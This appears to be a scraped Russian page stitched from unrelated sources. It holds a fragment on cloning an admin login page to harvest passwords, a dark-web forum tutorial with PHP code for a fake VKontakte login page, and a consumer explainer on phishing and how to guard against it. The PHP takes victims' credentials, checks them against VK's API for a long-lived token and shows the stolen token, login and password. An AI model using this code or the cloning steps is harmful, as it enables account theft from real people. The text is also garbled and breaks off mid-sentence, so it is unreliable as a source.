После успешного входа в систему он перейдет на страницу входа в Google, тем самым уменьшив вероятность быть обнаруженным. Последующее оформление веб-сайта с камуфляжем может привести к лучшим результатам. В Интернете также есть множество шаблонов веб-сайтов. Найдите его сами.
Атака клонов
контрольная работа:
Получите информацию администратора определенной станции и порт входа в фоновый режим веб-сайта через предыдущий сбор информации
клонировать этот порт входа
Предположим, что администратор вводит пароль учетной записи и другую информацию через социальные сети.
Как взломать вк через сайт с клубничкой? | Взлом вконтакте с помощью фишинг сайта как защититься?
Когда администратор входит в систему после ввода пароля учетной записи, а затем переходит на исходный адрес веб-сайта, постарайтесь предотвратить обнаружение администратором отклонений. 
Мы получили пароль от аккаунта
Источник: russianblogs.com
API ВКонтакте: пилим простенький фишинг [Часть 1]
На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем — пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
Мы обновили Tor зеркало до v3!
Для входа используйте следующий url: darkv3nw2. bzad.onion/
Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
Ссылка: https://t.me/chat_dark_time
- Общий раздел
- Журнал
- Взлом и защита информации
Morty
VIP
Morty
VIP
26 Окт 2017 537 113
Всем привет! С вами Andy. Делюсь с вами опытом как сделать простенький фишинговый сайт ВКонтатке с проверкой на валид. В этой части рассмотрим как написать скрипт авторизации/получения токена по логину и паролю, обработку ответов сервера ВКонтакте и вывод сообщения с ошибкой на странице при невалидности данных.
Дисклаймер
Материал предоставлен для ознакомления. Автор не побуждает совершать действия, описанные ниже. В статье упоминаются некоторые онлайн сервисы, что не является рекламой.
Приступим. Углубляться в то, как я делал html страницу не буду, ее можно скачать тут (Я.Диск)
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
Сначала мы напишем скрипт, который отправит данные из HTML-формы серверам ВКонтакте и запросит получение токена. Делать мы это будем с помощью cUrl и прямой авторизации через API VK. Запрос на прямую авторизацию выглядит примерно так:
https ://api.vk.com/oauth/token?grant_type=passwordscope=[наше значение]username=[наше значение]offline». Этого будет достаточно, чтобы входить на страницу ВК по токену через apidog.ru. !Важно: такой токен «живет» до тех пор, пока пользователь не сменит пароль, либо завершит все сессии в настройках безопасности.
Фишинг — Как создать и как защититься?
https ://api.vk.com/oauth/token?grant_type=passwordscope=offlineusername=[логин ВКонтакте] ‘text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8’,
‘content-type’ => ‘application/x-www-form-urlencoded’,
‘user-agent’ => ‘Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36’
);
//Запишем сюда значения логина и пароля из HTML формы
$login = $_POST[‘login’];
$password = $_POST[‘password’];
//Если какое-то поле оказалось пустым
if (empty($login) or empty($password))
//Отправим пользователя на стартовую страницу authorize и просигнализируем об ошибке
header(‘Location: /authorize.php?error_login=true’);
exit;
>
else
//Если все поля заполнены, то посылаем запрос на получение токена по нашей ссылке выше
$get_token = post (‘https://api.vk.com/oauth/token?grant_type=passwordscope=offlineusername=’.$login.’ array(
‘accept: ‘.$headers[‘accept’],
‘content-type: ‘.$headers[‘content-type’],
‘user-agent: ‘.$headers[‘user-agent’]
)
));
//Отобразим результат запроса
print_r ($get_token);
>
//cUrl POST
function post($url = null, $params = null, $proxy = null, $proxy_userpwd = null) $ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
if(isset($params[‘params’])) curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params[‘params’]);
>
if(isset($params[‘headers’])) curl_setopt($ch, CURLOPT_HTTPHEADER, $params[‘headers’]);
>
if(isset($params[‘cookies’])) curl_setopt($ch, CURLOPT_COOKIE, $params[‘cookies’]);
>
if($proxy) curl_setopt($ch, CURLOPT_PROXY, $proxy);
if($proxy_userpwd) curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy_userpwd);
>
>
$result = curl_exec($ch);
$result_explode = explode(«rnrn», $result);
$headers = ((isset($result_explode[0])) ? $result_explode[0].»rn» : »).».((isset($result_explode[1])) ? $result_explode[1] : »);
$content = $result_explode[count($result_explode) — 1];
preg_match_all(‘|Set-Cookie: (.*);|U’, $headers, $parse_cookies);
$cookies = implode(‘;’, $parse_cookies[1]);
return array(‘headers’ => $headers, ‘cookies’ => $cookies, ‘content’ => $content);
>
?>
[/SRC]
Окей, мы написали скрипт, который посылает логин, пароль на авторизацию и получение токена. Но нам еще предстоит обработать ответы сервера. Ответов может быть несколько
Спойлер: Варианты ответа сервера
Неправильный логин и/или пароль
Сервер запросил от вас ввода капчи
Сервер обнаружил двухфакторку на аккаунте
Сервер отправил BadRequest
Успех! Токен получен
Обработаем ответы сервера. Создадим условие: если сервер пошлет в ответ что угодно, кроме токена, то отправим пользователя на стартовую страницу с сообщением об ошибке. Для этого добавим в login.php вместо строчки
[SRC]
print_r ($get_token);
[/SRC]
следующее:
[SRC]
//Если авторизация прошла успешно, то отобразим полученный токен
if (preg_match(«/[a-z0-9]/», $get_token[‘headers’], $token))
echo «token=».$token[0];
echo «
login=».$login;
echo «
password=».$password;
exit;
>
//Если авторизация не прошла, то отправим пользователя на стартовую страницу с ошибкой
else header(‘Location: /authorize.php?error_login=true’);
[/SRC]
Теперь сделаем так, чтобы стартовая страница могла отслеживать появление ошибок и выдавать об этом сообщение — добавим эти строки с самого начала файла, после тега
[SRC][/SRC]
в нашу authorize.html и !Важно: поменяем расширание файла с .html на .php
[SRC]
$errorGet = $_GET[‘error_login’];
if (!$errorGet)
echo »
#hide_row_pass
«;
>
else
echo »
#hide_row_pass
«;
>
?>
[/SRC]
Что получилось в итоге. смотрите сами
Спойлер: Итоги:
Форма авторизации идентична vk.com
Проверяет валид данных и если что, шлет сообщение с ошибкой
Отображает ответ от сервера с полученным токеном
На сегодня пожалуй всё. В следующей части разберем как создать базу данных и записать туда валидные данные аккаунтов ВК. Надеюсь, эта информация была для вас полезна!
Источник: dark-time.life
Что такое фишинг и как от него защититься?
«Здравствуйте, я Barrister Ekoue Dodji, и вас ждет огромное нигерийское наследство от умершего однофамильца». Примерно с такой фразы начинается классическое фишинговое письмо, целью которого является — обмануть и оставить в дураках. Как вы поняли, в этом материале будем разговаривать о фишинге. О том, что это за явление, какие формы оно умеет принимать и, что важнее всего, как с ним бороться.
Что такое фишинг?
Фишинг — это набор методик, которые используют злоумышленники, чтобы стащить личную информацию, какой-нибудь логин с паролем или данные кредитных карточек. Эти техники отличаются от других вариантов взлома подходом к взаимодействию с жертвой. Внедрение вирусов или DOS-атака зачастую направлены на программное обеспечение. Фишинг же завязан на контакте с живым человеком, который, в силу отсутствия навыков работы с компьютером или банальной наивности, сам подставится под хакера и выдаст ему что-то конфиденциальное.
Этимология термина
В английском языке это немного искаженное слово Fishing (пишется как Phishing), что переводится как «рыбалка». Ну и название тем самым обосновано. Фишинг — это своего рода рыбалка, где надо придумать для жертвы наименее подозрительную и наиболее заманчивую наживку. Дождаться, когда она клюнет. А после этого подсечь, чтобы рыбка не сорвалась.
Только все это, используя реверсную инженерию вкупе с компьютерными технологиями.
Комьюнити теперь в Телеграм
Подпишитесь и будьте в курсе последних IT-новостей
Как работает фишинг?
Как и ловля рыбы, интернет-фишинг подразумевает несколько вариантов взаимодействия со своей добычей.
«Официальные» электронные письма
Начнем с методики, которую не так-то просто распознать даже умеренному параноику. Как это работает: вам приходит письмо якобы от Apple, Google, Ozon или любой другой крупной компании, чьими услугами вы пользуетесь. В письме есть всякие логотипы, адреса, да и название ящика вроде тоже официальное. Но просьба странная.
Просят либо отправить свой логин с паролем, либо пройти по какой-нибудь подозрительной ссылке для подтверждения учетной записи (еще иногда приписывают, что скоро ее удалят, если этого не сделать). Жертва не видит угрозы, доверяет крупному бизнесу и попадается на эту уловку. В итоге или «сливает» злоумышленникам персональные данные для входа в условный Apple ID, или скачивает на компьютер вирус собственными руками.
Подставные сайты
Что-то в духе тех же писем, только в ход идут веб-сайты. Сразу отмечу, что подставные сайты редко пробираются в выдачу поисковиков на адекватные позиции, и встретить их там непросто. А вот ошибиться при вводе адреса сайта вручную или наткнуться на фальшивку в мессенджере или почтовом клиенте можно.
Зачастую ссылка выглядит как официальная. Ну, может, домен другой или один символ отсутствует. Кто станет на такое обращать внимание, верно? Страница тоже выглядит привычно, без изысков. Есть поле для ввода логина и пароля.
Только это форма отправки логина и пароля злоумышленникам.
А еще там может быть форма для ввода платежной информации. Тоже вполне стандартная. Даже и не подумаешь, что пытаются обмануть. Но это поле никак не связано с платежными системами и банками. Только с преступниками, решившими на вас поживиться.
Такое крайне нередко встречается на торговых площадках в духе Авито и Юлы. Люди кидают ссылку якобы на официальный портал для оплаты отправки вещи, а там ловушка.
Провокационные электронные письма
И снова о письмах, но на этот раз несколько об иных. Выглядят они как типичный обман, ставящий читающего в эмоциональные условия, которые заставят его совершить необдуманное действие. Предоставить взломщику доступ личными данным или заплатить внушительную сумму.
Письмо может выглядеть как послание от некоего нигерийского баристера, обнаружевшего в Уругвае человека с вашей фамилией, а у того на счету миллионы долларов, которые надо передать родственникам. Родственника нет, поэтому он хочет все перевести вам. Только надо сначала выйти на связь и сделать дополнительную оплату.
Еще бывают варианты, когда от злоумышленника приходит письмо, в котором он заявляет, что подключился к веб-камере жертвы и записал видео, как та развлекается, посещая сайты для взрослых. Вместе с тем требует в среднем около 500 долларов в биткоинах.
И таких писем может быть много. Кто-то предлагает деньги. Кто-то лотереи. Вместо писем иногда попадается баннеры, в которых пишется примерно то же самое. Схемы идентичные.
Во всех случаях преступник пытается надавить на самое больное. Либо опозорить, либо озолотить. Трудно отказаться, да?
Метод обмана стары, как сам интернет, но даже в 2020 году такие письма приходят с завидной регулярностью большому количеству людей, независимо от посещаемых страниц и ресурсов, на которых эти люди регистрируются.
Телефонный фишинг
Почти то же самое, что и письма от официальных представителей, только голосом по телефону. Пожалуй, самое распространенное на текущий момент явление — звонки от сотрудников банка. Вам звонит персона, представляется банковским рабочим и говорит, что прямо сейчас, в эту самую секунду, кто-то списывает с вашего счета деньги.
Жертва в растерянности не совсем понимает, какие деньги и за что списывают. «Сотрудник банка» заявляет, что готов все вернуть обратно, только вот надо назвать номер карты и другие клиентские данные. А потом код из СМС. На кону деньги. Возможно, последние, ну что еще делать? Люди говорят и остаются ни с чем.
Гораздо проще, когда мошенники ошибаются и говорят о суммах, которых на счету нет. Или вовсе представляются сотрудниками банков, в которых человек не держит счетов. Но если попадут, то шансов на успех довольно много. Доверчивых хватает.
Как защитить себя от фишинга?
На самом деле, знание о том, что такое фишинг, уже в какой-то степени помогает себя защитить. Как минимум повысится бдительность и возникнет четкое понимание того, что в интернете слишком много персонажей, желающих стащить у вас персональные данные или деньги. Но мы все-таки рассмотрим и другие варианты. Итак, представьте, мы – потенциальная жертва фишинга, которая вовсе не желает такой быть. Вот что мы делаем прямо сейчас, чтобы себя спасти.
Изучаем техники фишинга
Да, самообразование крайне важно. Я, конечно, описал парочку популярных фишинг-методик, но этого недостаточно. Мошенники — смышленые ребята. У них Rhttps://timeweb.com/ru/community/articles/chto-takoe-fishing-i-kak-ot-nego-zashchititsya» target=»_blank»]timeweb.com[/mask_link]